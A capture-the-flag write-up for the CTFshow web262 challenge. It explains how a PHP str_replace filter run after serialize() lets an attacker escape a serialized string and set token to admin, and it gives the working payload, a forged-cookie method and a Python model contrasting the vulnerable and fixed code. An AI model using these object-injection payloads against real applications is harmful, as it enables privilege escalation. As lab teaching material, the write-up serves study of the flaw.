CTFshow WEB beginner series: deserialization, web262
Challenge code
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-03 02:37:19
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-03 16:05:38
# @message.php
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

error_reporting(0);

class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';

    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}

$f = $_GET['f'];
$m = $_GET['m'];
$t = $_GET['t'];

if(isset($f) && isset($m) && isset($t)){
    $msg = new message($f,$m,$t);
    // the filter runs on the already-serialized text, after the s:N: length prefixes were computed
    $umsg = str_replace('fuck', 'loveU', serialize($msg));
    setcookie('msg',base64_encode($umsg));
    echo 'Your message has been sent';
}

highlight_file(__FILE__);
As can be seen, passing the three values gives you a cookie containing a serialized message object.
Following the comment, look at message.php:
<?php
highlight_file(__FILE__);
include('flag.php');

class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';

    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}

if(isset($_COOKIE['msg'])){
    // the cookie is fully attacker-controlled and goes straight into unserialize()
    $msg = unserialize(base64_decode($_COOKIE['msg']));
    if($msg->token=='admin'){
        echo $flag;
    }
}
It deserializes the cookie obtained from the previous page, and if token=='admin' we get the flag.
Normally, though, token is set to user, so we need to inject into to and perform a deserialization string escape.
Serialized string in the normal case, ?f=1&m=2&t=3: O:7:"message":4:{s:4:"from";i:1;s:3:"msg";i:2;s:2:"to";i:3;s:5:"token";s:4:"user";}
When t=3";s:5:"token";s:5:"admin";} the result is: O:7:"message":4:{s:4:"from";i:1;s:3:"msg";i:2;s:2:"to";s:28:"3";s:5:"token";s:5:"admin";}";s:5:"token";s:4:"user";}
During unserialize, parsing ends at the ;} that closes the object, and the trailing part (";s:5:"token";s:4:"user";}, shown in red in the original) is ignored.
But because the count in s:28:"3"; is not right for the escape, the payload cannot be deserialized the way we want, so we need the str_replace('fuck', 'loveU', serialize($msg)); from the challenge to bypass this.
When t=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}
the length count in the serialized string works out: O:7:"message":4:{s:4:"from";i:1;s:3:"msg";i:2;s:2:"to";s:135:"loveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveU";s:5:"token";s:5:"admin";}";s:5:"token";s:4:"user";}
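To make the length accounting concrete, here is an added example (not part of the challenge or written by its author) that models PHP's serialize()/unserialize() for this class in Python, assuming ASCII string fields, and contrasts the challenge's replace-after-serialize order with the fixed order of filtering the values before serialization:

```python
import re

def php_serialize_message(from_, msg, to, token="user"):
    """Model of PHP serialize() for the message class (ASCII string fields only)."""
    def s(v):
        return f's:{len(v)}:"{v}";'
    body = (s("from") + s(from_) + s("msg") + s(msg)
            + s("to") + s(to) + s("token") + s(token))
    return f'O:7:"message":4:{{{body}}}'

def php_unserialize_object(data):
    """Length-driven parse like PHP unserialize(): each s:N: prefix is trusted,
    and anything after the '}' that closes the object is ignored."""
    head = re.match(r'O:\d+:"[^"]*":(\d+):\{', data)
    if not head:
        raise ValueError("not a serialized object")
    pos, fields = head.end(), {}
    def read_string():
        nonlocal pos
        if not data.startswith("s:", pos):
            raise ValueError(f"expected a string at offset {pos}")
        n_end = data.index(":", pos + 2)
        n = int(data[pos + 2:n_end])
        start = n_end + 2                       # skip the :" opening quote
        value = data[start:start + n]           # exactly N characters, no escaping
        if data[start + n:start + n + 2] != '";':
            raise ValueError("string body does not match its length prefix")
        pos = start + n + 2
        return value
    for _ in range(int(head.group(1))):
        key = read_string()
        fields[key] = read_string()
    if data[pos] != "}":
        raise ValueError("object not closed")
    return fields                               # trailing bytes silently dropped

def vulnerable_cookie(f, m, t):
    # Challenge order: serialize first, then replace on the serialized text.
    # Every 'fuck' -> 'loveU' hit grows the body by one byte while s:N: stays stale.
    return php_serialize_message(f, m, t).replace("fuck", "loveU")

def fixed_cookie(f, m, t):
    # Filter the field values before serializing, so each s:N: matches its body.
    clean = lambda v: v.replace("fuck", "loveU")
    return php_serialize_message(clean(f), clean(m), clean(t))

# Constructed input: 27 'fuck' hits pay for the 27-byte injected tail.
TAIL = '";s:5:"token";s:5:"admin";}'
PAYLOAD = "fuck" * len(TAIL) + TAIL
```

With the challenge's order, php_unserialize_object(vulnerable_cookie("1", "2", PAYLOAD))["token"] comes back as admin, while fixed_cookie keeps it at user because the injected text is counted inside the to field.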
Another method: directly generate the base64 encoding of a serialized string with token=='admin' and put it in the Cookie.
<?php
class message{
    public $token='admin';
}
echo base64_encode(serialize(new message()));